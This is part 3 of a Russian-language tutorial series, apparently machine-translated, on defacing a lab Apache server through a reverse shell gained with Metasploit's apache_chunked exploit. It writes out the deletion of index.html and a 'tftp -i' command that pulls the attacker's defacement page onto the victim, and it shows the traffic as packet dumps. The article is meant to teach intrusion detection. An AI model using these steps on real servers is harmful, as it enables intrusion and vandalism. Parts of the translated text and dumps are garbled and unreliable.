Дефейс веб-сервера (часть 3)

искажений веб-сервера (часть 1)

искажений веб-сервера (часть 2)

Во второй части этой серии статей мы остановились после того, как получили доступ к веб-серверу на системном уровне через обратную командную оболочку. Пришло время на самом деле спуститься и испачкаться. С этого момента мы узнаем, как можно испортить веб-страницу. Пожалуйста, имейте в виду, что в этой серии статей рассказывается, как именно это можно сделать. Однако весь смысл этого упражнения заключается в том, чтобы рассказать людям об опасностях онлайн-мира. Я не планировал, что это будет хакерская демонстрация «раскраски по номерам». Если вы решите использовать эту серию статей для фактического искажения веб-сервера, отличного от того, который находится в вашей компьютерной лаборатории, то вы совершаете преступное деяние, и если вас поймают, с вами будут поступать соответствующим образом. Другими словами, играйте только в лабораторных условиях!

Давайте сделаем это дело!

Хорошо, теперь мы контролируем удаленный веб-сервер. Давай осмотримся вокруг? С этой целью я сделаю «dir», чтобы увидеть, что находится в каталоге, как показано ниже.

C:Program FilesApache GroupApache>каталог

директор
Том на диске C не имеет метки.
Серийный номер тома — C8E5-633B.

Каталог C:Program FilesApache GroupApache

12.12.2004 10:04a <DIR>.
12.12.2004 10:04a <DIR>..
15.12.2000 08:39a 14,583 ОБ_АПАЧЕ
25.01.2001 03:12 4,182 Объявление
30 января 2001 г., 12:00 20 480 Apache.exe
30.01.2001 12:00a 323 584 ApacheCore.dll
12.12.2004 10:04a <КАТАЛОГ> bin
12.12.2004 10:04a <DIR> cgi-bin
12.12.2004 10:04a <DIR> conf
12.12.2004 10:04a <КАТАЛОГ> htdocs
12.12.2004 10:04a Значки <DIR>
12.12.2004 10:04a <DIR> включить
05.06.2000 01:28 41 421 КЛЮЧ
12.12.2004 10:04a <DIR> библиотека
12.12.2004 10:04a <КАТАЛОГ> libexec
15.01.2001 10:26a 2,885 ЛИЦЕНЗИЯ
12.12.2004 10:07a Журналы <DIR>
12.12.2004 10:04a Модули <DIR>
12.12.2004 10:04a <DIR> прокси
15.12.2000 09:04a 4,202 README-WIN.TXT
12.12.2004 10:04a Источник <DIR>
06.11.2000 11:57a 1,342 ПРЕДУПРЕЖДЕНИЕ-WIN.TXT
29.01.2001 11:23p 20 480 Win9xConHook.dll
29.01.2001 11:24p 40 960 xmlparse.dll
29.01.2001 11:24p 73 728 xmltok.dll
11 файлов 547 847 байт
14 Dir(s) 11 142 889 472 байта свободно

C:Program FilesApache GroupApache>

Хммммм, ну, я бы сказал, что мы, вероятно, как «дефейсеры веб-страниц», захотим заглянуть в каталог htdocs для файла index.html. Итак, я «cd» в этот каталог и делаю «dir».

C:Program FilesApache GroupApachehtdocs>каталог

директор
Том на диске C не имеет метки.
Серийный номер тома — C8E5-633B.

Каталог C:Program FilesApache GroupApachehtdocs

18.12.2004 08:20a <DIR>.
18.12.2004 08:20a <DIR>..
03.07.1996 01:18a 2326 apache_pb.gif
19.01.2001 01:39p 1 354 index.html.ru
12.12.2004 10:04a Руководство по <DIR>
04.04.2000 10:26a 743 README.rus
3 файла(ов) 4423 байта
3 Dir(s) 11 143 004 160 байт свободно

C:Program FilesApache GroupApachehtdocs>

Так что это действительно наша добыча. Что нам нужно сделать сейчас, так это удалить этот файл и после этого вставить на его место наш собственный index.html. Как это сделать? Что ж, любимый способ передачи данных туда и обратно, используемый хакерами, — это делать это через TFTP. Нашему злоумышленнику потребуется сервер TFTP, работающий на его компьютере, и затем он будет использовать встроенный клиент TFTP на собственном компьютере жертвы, чтобы инициировать передачу.

Давайте подведем итоги на минуту. Мы получили доступ к оболочке на веб-сервере с помощью эксплойта apache_chunked. Это было сделано с помощью Metasploit Framework. Наша цель — смоделировать, как это сделает тот, кто хочет дефейсить. Пока мы на верном пути. Получив доступ к веб-серверу, мы сделали быстрый список каталогов, который подтвердил, что наш каталог htdocs был там, и что файл index.html также был там. Этот последний файл мы хотим изменить с помощью нашего сообщения о порче. С этого момента мы будем использовать вышеупомянутый протокол TFTP для получения нашего файла index.html, а затем вернем его на веб-сервер. Итак, давайте сделаем это!

Действие!

Вся указанная ниже информация отображается на уровне пакетов. Это сделано по очень веской причине. Я хотел бы, чтобы вы, читатель, смогли понять, как выглядит эта атака на уровне пакетов. В конце концов, если вы исследуете брандмауэр или журналы обнаружения вторжений, вам всегда придется просматривать сами пакеты!

Ниже показано, как атакующая машина удаляет существующий файл index.html на веб-сервере. Это нужно было сделать с помощью команды «del /F», так как этот файл использовался. Злоумышленнику пришлось удалить файл index.html, так как он хотел вставить свой через TFTP.

11:02:39.079422 IP (tos 0x0, ttl 64, id 50860, смещение 0, флаги [DF], длина: 58) 192.168.1.102.4321 > 192.168.1.101.1028: P [tcp sum ok] 51364367:51364385( 18) акк 813323178 победа 10720
0x0000: 4500 003a c6ac 4000 4006 eff5 c0a8 0166 E..:[email protected]@……f
0x0010: c0a8 0165 10e1 0404 030f c20f 307a 53aa …e……..0zS.
0x0020: 5018 29e0 a0a4 0000 6465 6c20 2f46 2069 стр.)…..дел./Fi
0x0030: 6e64 6578 2e68 746d 6c0a ndex.html.

Из пакетов, показанных ниже, мы можем убедиться, что атакующая машина 192.168.1.102 отправила команду tftp на скомпрометированный веб-сервер;

tftp -i 192.168.1.102 ПОЛУЧИТЬ index.html

Второй пакет показывает, что скомпрометированный веб-сервер отправляет этот tftp-запрос на tftp-сервер злоумышленников. Помните, что у нашего злоумышленника есть обратная командная оболочка, поэтому я показываю оба пакета, как показано ниже.

11:02:48.698588 IP (tos 0x0, ttl 64, id 50878, смещение 0, флаги [DF], длина: 77) 192.168.1.102.4321 > 192.168.1.101.1028: P [tcp sum ok] 51364389:51364426( 37) акк 813323812 победа 10720
0x0000: 4500 004d c6be 4000 4006 efd0 c0a8 0166 [электронная почта защищена]@……f
0x0010: c0a8 0165 10e1 0404 030f c225 307a 5624 …e…….%0zV$
0x0020: 5018 29e0 0c3c 0000 7466 7470 202d 6920 P.)..<..tftp.-i.
0x0030: 3139 322e 3136 382e 312e 3130 3220 4745 192.168.1.102.GE
0x0040: 5420 696e 6465 782e 6874 6d6c 0a T.index.html.

11:02:48.699161 IP (tos 0x0, ttl 128, id 117, смещение 0, флаги [DF], длина: 77) 192.168.1.101.1028 > 192.168.1.102.4321: P [tcp sum ok] 813323812:813323849( 37) акк 51364426 победа 17443
0x0000: 4500 004d 0075 4000 8006 761a c0a8 0165 [электронная почта защищена]…v….e
0x0010: c0a8 0166 0404 10e1 307a 5624 030f c24a …f….0zV$…J
0x0020: 5018 4423 f1d3 0000 7466 7470 202d 6920 PD#….tftp.-i.
0x0030: 3139 322e 3136 382e 312e 3130 3220 4745 192.168.1.102.GE
0x0040: 5420 696e 6465 782e 6874 6d6c 0a T.index.html.

Здесь опущено несколько пакетов, так как они просто подтверждают запрошенную передачу tftp. См. приведенную ниже информацию о переносе измененной веб-страницы на скомпрометированный веб-сервер.

11:02:48.834306 IP (tos 0x0, ttl 64, id 26457, смещение 0, флаги [DF], длина: 544) 192.168.1.102.1024 > 192.168.1.101.1030: [udp sum ok] UDP, длина: 516
0x0000: 4500 0220 6759 4000 4011 4d58 c0a8 0166 E…[электронная почта защищена]@.MX…f
0x0010: c0a8 0165 0400 0406 020c 3502 0003 0001 …e……5…..
0x0020: 3c21 444f 4354 5950 4520 6874 6d6c 2050 <!DOCTYPE.html.P
0x0030: 5542 4c49 4320 222d 2f2f 5733 432f 2f44 UBLIC.»-//W3C//D
0x0040: 5444 2048 544d 4c20 342e 3031 2054 7261 TD.HTML.4.01.Tra
0x0050: 6e73 6974 696f 6e61 6c2f 2f45 4e22 3e0a nsitional//EN”>.
0x0060: 3c68 746d 6c3e 0a3c 6865 6164 3e0a 2020 <html>.<head>…
0x0070: 3c74 6974 6c65 3e69 6e64 6578 2e68 746d <название>index.htm
0x0080: 6c32 3c2f 7469 746c 653e 0a3c 2f68 6561 l2</title>.</hea
0x0090: 643e 0a3c 626f 6479 3e0a 3c68 323e 3c62 d>.<body>.<h2><b
0x00a0: 723e 0a3c 2f68 323e 0a3c 6831 3e3c 6272 r>.</h2>.<h1><br
0x00b0: 3e0a 3c2f 6831 3e0a 3c68 313e 3c62 723e >.</h1>.<h1><br>
0x00c0: 0a3c 2f68 313e 0a3c 6831 3e59 6f75 2068.</h1>.<h1>Вы.h
0x00d0: 6176 6520 6a75 7374 2062 6565 6e20 6f77 авеню.Just.been.ow
0x00e0: 6e65 6420 6279 2061 6c74 2e64 6f6e 3c2f ned.by.alt.don</
0x00f0: 6831 3e0a 266e 6273 703b 266e 6273 703b h1>.&nbsp;&nbsp;
0x0100: 266e 6273 703b 2041 206c 6f63 616c 6c79 &nbsp;.A.локально
0x0110: 206f 776e 6564 2061 6e64 206f 7065 7261.владелец.и.опера
0x0120: 7465 6420 4361 6e61 6469 616e 2073 7562 ted.Canadian.sub

Теперь обратите внимание на показанный ниже пакет, означающий успешную передачу страницы index.html.

11:02:48.847478 IP (tos 0x0, ttl 128, id 121, смещение 0, флаги [DF], длина: 98) 192.168.1.101.1028 > 192.168.1.102.4321: P [tcp sum ok] 813323849:813323907( 58) акк 51364426 победа 17443
0x0000: 4500 0062 0079 4000 8006 7601 c0a8 0165 [электронная почта защищена]…v….e
0x0010: c0a8 0166 0404 10e1 307a 5649 030f c24a …f….0zVI…J
0x0020: 5018 4423 fa01 0000 5472 616e 7366 6572 PD#….Передача
0x0030: 2073 7563 6365 7373 6675 6c3a 2036 3736.успешно:.676
0x0040: 2062 7974 6573 2069 6e20 3120 7365 636f.bytes.in.1.seco
0x0050: 6e64 2c20 3637 3620 6279 7465 732f 730d nd,.676 байт/с.
0x0060:0d0a..

Теперь произошло искажение веб-страницы, и, надеюсь, это все, что сделал человек. Злоумышленник мог так же легко установить и всевозможную гадость. Например; руткит, FTP-сервер или другой нежелательный контент. На самом деле, если ваш веб-сервер поврежден, вы должны отформатировать свой жесткий диск, так как на нем может быть что угодно. Делать что-либо меньшее значит накликать катастрофу. Просто заменить испорченную веб-страницу недостаточно.

Ах, да!

Я почти забыл! Как выглядит испорченная веб-страница? Что ж, дорогой читатель, если вы изучали приведенный выше пакет, вы уже знаете, но взгляните на приведенный ниже снимок экрана испорченного веб-сервера.

Итак, как вы можете видеть, дефейсировать веб-сервер относительно просто. Однако сделать это непросто, так это обнаружить уязвимость в такой программе, как Apache. Более того, затем кодирование способа его использования. Люди, которые проводят такого рода исследования и работают, — настоящие таланты. Наконец, давайте не будем забывать о таких людях, как HDM и Spumpm, которые посвятили свое время разработке Metasploit Framework, чтобы мы все могли узнать больше. Я искренне надеюсь, что этот цикл статей был вам полезен. Если у вас есть какие-либо вопросы по этому поводу, пожалуйста, свяжитесь со мной.

искажений веб-сервера (часть 1)

искажений веб-сервера (часть 2)